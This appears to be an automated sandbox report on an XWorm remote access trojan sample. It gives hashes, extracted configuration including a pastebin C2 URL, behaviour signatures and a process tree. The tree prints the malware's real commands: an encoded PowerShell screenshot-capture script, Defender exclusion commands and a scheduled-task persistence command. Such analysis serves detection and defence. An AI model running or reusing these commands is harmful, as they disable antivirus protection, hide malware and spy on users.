Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-12-2024 10:09

General

  • Target

    s3_n.exe

  • Size

    5.5MB

  • MD5

    0e747d8ff04debc20e1f2df6c71b9190

  • SHA1

    76d41d66c9ede87d1aa52492a308087e2063e258

  • SHA256

    adf1fdc27468d99ac5169485c733eb472d00c79ba4c4d07c7d7f396ca19d7d70

  • SHA512

    ada850b09e34000e2e4d499ee1c915853ee646a2b8fe2da881541635ba3806eb0e035f08376359fb88696d8eabb08e3efd42f2cd60c4c73db431cc45a31c1e87

  • SSDEEP

    49152:3eR7xTxs5J/ClgJZGq1XNWqAqaCeOw/efl7zYIx2jy5EJfDxY8bw0PXM2W0wplmP:OB4/CZzr8fl7EOE0mmS1

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

U7sKl0tpfhRT8PYA

Attributes
  • Install_directory

    %LocalAppData%

  • install_file

    rundll64.exe

  • pastebin_url

    https://pastebin.com/raw/EiiXCJbn

aes.plain

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies system certificate store 2 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\s3_n.exe
    "C:\Users\Admin\AppData\Local\Temp\s3_n.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:2548
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2120
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rldzynye\rldzynye.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:476
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC2E2.tmp" "c:\Users\Admin\AppData\Local\Temp\rldzynye\CSCBACE6689334D435DBD98868340C58F88.TMP"
          4⤵
            PID:2960
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Add-MpPreference -ExclusionPath \"C:\\\""
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1980
      • C:\Users\Admin\AppData\Local\Temp\temporary1523159955\temp.bin
        C:\Users\Admin\AppData\Local\Temp\temporary1523159955\temp.bin
        2⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:4928
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\temporary1523159955\temp.bin'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:876
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'temp.bin'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3620
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\rundll64.exe'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:888
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'rundll64.exe'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2244
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "rundll64" /tr "C:\Users\Admin\AppData\Local\rundll64.exe"
          3⤵
          • Scheduled Task/Job: Scheduled Task
          PID:4672
    • C:\Users\Admin\AppData\Local\rundll64.exe
      C:\Users\Admin\AppData\Local\rundll64.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:3680
    • C:\Users\Admin\AppData\Local\rundll64.exe
      C:\Users\Admin\AppData\Local\rundll64.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:3088

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      3KB

      MD5

      614f88cf39eb3223246afec4bf1463b4

      SHA1

      74d738ee6fdada75ac1ef1645073005e3f6b6cfb

      SHA256

      021636a793f57f23b16356c5b84fdf0122fdcadfaba305e4df4654bfbfa442bd

      SHA512

      84a7151e0471e659699a15c25d9063af1975e79bb5f23de6b3bc0d3b96cd161d70ad35f6acdbc8123b38bac9918df8b202bd6f1f4ca8061919074973e6063a77

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\rundll64.exe.log

      Filesize

      654B

      MD5

      2ff39f6c7249774be85fd60a8f9a245e

      SHA1

      684ff36b31aedc1e587c8496c02722c6698c1c4e

      SHA256

      e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

      SHA512

      1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      e67b7a4d382c8b1625787f0bcae42150

      SHA1

      cc929958276bc5efa47535055329972f119327c6

      SHA256

      053d0b08f22ff5121cb832d514195145a55b9a4ca26d1decd446e11b64bef89c

      SHA512

      3bf0311fe0c57fb9a1976fbeae6d37015736c32c59832252f3bc4c055b2a14c6bcc975dcd63b480d4f520672687a62d5ccd709a6ebdb4566bb83fb081b3f4452

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      6d3e9c29fe44e90aae6ed30ccf799ca8

      SHA1

      c7974ef72264bbdf13a2793ccf1aed11bc565dce

      SHA256

      2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

      SHA512

      60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      6a5650126660a2760e93e48a63a9f626

      SHA1

      35710b657094c22ed66a37854173ce2090f02caa

      SHA256

      e981ba57e2617381d8d75f0c7ffb6e836afbeb475434a06b56b9a5a988761e92

      SHA512

      4e4cc9dc507cd95d5f9ddc181f68e97e5351aa7748c574717ac4cf0ff882f7fb1c6d6460b63560db382697c44118b8c2a288e2c94c9c8457b15ca6a9b1a66ba9

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      10890cda4b6eab618e926c4118ab0647

      SHA1

      1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d

      SHA256

      00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14

      SHA512

      a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      75b5bc86e6b72b4df51cc3146247a2b4

      SHA1

      bb90d920350bb158cd370f7188953eba4a1a4f03

      SHA256

      f44f98f21d49a01e043dbdc2ca0f6c020a98ce4aa583d416bff5d6ce63ff4625

      SHA512

      57bafbaedcced9205cc460ff7bd682b2cb2ac6190a0edb841bdf09bcdd172d47954801dbcfd7bb0312e871a11c9538e520bc353037e6aceb540ee39f01ea6400

    • C:\Users\Admin\AppData\Local\Temp\RESC2E2.tmp

      Filesize

      1KB

      MD5

      afa0f0c83e95a5390d7cdf0a64777d66

      SHA1

      b6f4821a46b9f8d2718d62ff8c9578f1db326317

      SHA256

      0a87c3d5574088f4222a5f885b6113f9f43f23914cc28182ff592fcd98f015f8

      SHA512

      29f86cf249af3bf972a52e7591bf20215653e7531eff767d8d267c93b2c7c6352dbb1e977526cbb86930b2355f158f5a99bf2d479dc4b696dadf33a6437570d5

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v1lnxdww.cqf.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\rldzynye\rldzynye.dll

      Filesize

      4KB

      MD5

      87c6850e3d15f933e1fa2754a0fb65df

      SHA1

      3d85628e7216d629a8dc001f65e6d2fe5fd38d59

      SHA256

      55908a41ad20f0d1ae5eaf849ca50e6fcb0e003c5860834c93e200e0dfdc3232

      SHA512

      fd4844255dac595572f28a7f8a35a80225a33ac9ab3781d6039005b8a9765982202b89127dcf4fb33ff66527de9b0365a536454487b6cd178c17373e2dc7ac1e

    • C:\Users\Admin\AppData\Local\Temp\temporary1523159955\temp.bin

      Filesize

      44KB

      MD5

      c67100bb482bc085af61d23aaa2c2191

      SHA1

      1c2dbd8605509a30cb1fee426142c381dc392db2

      SHA256

      41c277b3d567ac5449e29328212596efe8c16bf58bc9043b70a14d7142111163

      SHA512

      a83ee017b97d5858cb337f0f877f27cfe0fea6b0a838711db5bf4445a57ce71cf2e8a4462a38cfbbaf545ea7c0cdefcb58b30cfb9184ef76ddd71011fcfe8af0

    • C:\Users\Admin\AppData\Local\Temp\zYk9RkDC8q\Display (1).png

      Filesize

      424KB

      MD5

      2405989cf5916e4a68c94d6fa1796357

      SHA1

      a4bd3facdfd09b05b69c044ec386363e24cb1c59

      SHA256

      5f96136c44c168229c34eceeb8feaf96878cf83e3929a40792ce02e8da4f0939

      SHA512

      c32acd5ec4eded828d5f0c5d0b3e25c36553419a5da47d265a546fb7255f121956729ad8268f3bcd8f1257c36a7fd521b642abfc106d9d3913a4c6f41799a39a

    • \??\c:\Users\Admin\AppData\Local\Temp\rldzynye\CSCBACE6689334D435DBD98868340C58F88.TMP

      Filesize

      652B

      MD5

      0929f6f38fbf984df81e517d68c85533

      SHA1

      24fd8ef4f28a168ea2e9fe41a63cb97700e32afb

      SHA256

      499f7ee8160e7ea76c80351bf3b3c45a503d645afb2722b8cc6762b4e3027b99

      SHA512

      95263e6d73b955c73e822613b9bd0c5752efbd99c7ea4ce1101e6195b2c50d529894822a4b21fea9faf48f291328a1ca07276f1fbce5eb82710b713001ecf168

    • \??\c:\Users\Admin\AppData\Local\Temp\rldzynye\rldzynye.0.cs

      Filesize

      1004B

      MD5

      c76055a0388b713a1eabe16130684dc3

      SHA1

      ee11e84cf41d8a43340f7102e17660072906c402

      SHA256

      8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

      SHA512

      22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

    • \??\c:\Users\Admin\AppData\Local\Temp\rldzynye\rldzynye.cmdline

      Filesize

      607B

      MD5

      8bb0db3a99d63556e938aa2384d0caa2

      SHA1

      e38b820970216f0cc362988dd69bd2e11de16a3f

      SHA256

      be0ab01dd77120c12911185977a62dd6ad0922e519a5a3c618bf632e45d50ad9

      SHA512

      653568c1c9111db322ad403ae3c0de23cd5f501da34dc81e358b8ec7d7987285007130f38edf6a272219743ba58d206e3ee409c6a716a764e192bcedc4102dd5

    • memory/2120-30-0x00007FFFE13C0000-0x00007FFFE1E81000-memory.dmp

      Filesize

      10.8MB

    • memory/2120-25-0x0000022D6CA90000-0x0000022D6CA98000-memory.dmp

      Filesize

      32KB

    • memory/2120-0-0x00007FFFE13C3000-0x00007FFFE13C5000-memory.dmp

      Filesize

      8KB

    • memory/2120-12-0x00007FFFE13C0000-0x00007FFFE1E81000-memory.dmp

      Filesize

      10.8MB

    • memory/2120-11-0x00007FFFE13C0000-0x00007FFFE1E81000-memory.dmp

      Filesize

      10.8MB

    • memory/2120-10-0x0000022D6D380000-0x0000022D6D3A2000-memory.dmp

      Filesize

      136KB

    • memory/4928-48-0x0000000000130000-0x0000000000142000-memory.dmp

      Filesize

      72KB